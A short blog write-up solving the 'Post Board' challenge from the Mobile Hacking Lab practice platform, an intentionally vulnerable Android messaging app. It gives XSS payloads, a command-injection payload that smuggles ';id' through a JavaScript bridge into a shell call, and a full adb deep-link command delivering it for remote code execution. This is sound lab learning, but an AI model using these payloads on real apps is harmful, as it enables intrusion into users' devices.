Post Board
Hello everyone , In this blog post , I will try to explain my solution steps for Post Board challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
After we install The APK then we open it its a message application with an input field
image.png Let’s Examine the AndroidManifest.xml we found that activity
com.mobilehackinglab.postboard.MainActivity, it’s an exported activityhave a data schema with scheme=
postboardand android:host=postmessagewith a categoryBROWSABLE
let’s analysis this main activity code :
First thing we find is
setupView()that have :setJavaScriptEnabled(**true**)path that load the url
file:///android_asset/index.html
the second thing is
handleIntent()Verifies if the intent’s URI scheme is
postboardand the host ispostmessage.Decodes a Base64-encoded path in the URI, escapes certain characters, and passes it to JavaScript via
WebAppInterface.postMarkdownMessageto display it on the home page.
Let’s try to test our input :
First payload is
<h1>kero</h1>⇒ already successthe second payload is
<img src=x onerror=alert(1)>⇒ success
when we analysis the
WebAppInterfaceclass we found this FuncpostCowsayMessage()
it execute the
cowsayscript located atCowsayUtil.scriptPathpassing the message arg as
{"bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message}it use a shell , then call the message + script path
may be we can call the
postCowsayMessageand then passwhoamias acowsayMessagethen it will be passed to
runCowsayand then exec it by :my payload is
<img src=x onerror=WebAppInterface.postCowsayMessage("Kero0x1_is_here;id")>let’s encode it and put it with adb
adb shell am start -n "com.mobilehackinglab.postboard/.MainActivity" -a "android.intent.action.VIEW" -d "postboard://postmessage/PGltZyBzcmM9eCBvbmVycm9yPVdlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgiS2VybzB4MV9pc19oZXJlO2lkIik+"
and here we success and already get rce 😉
Last updated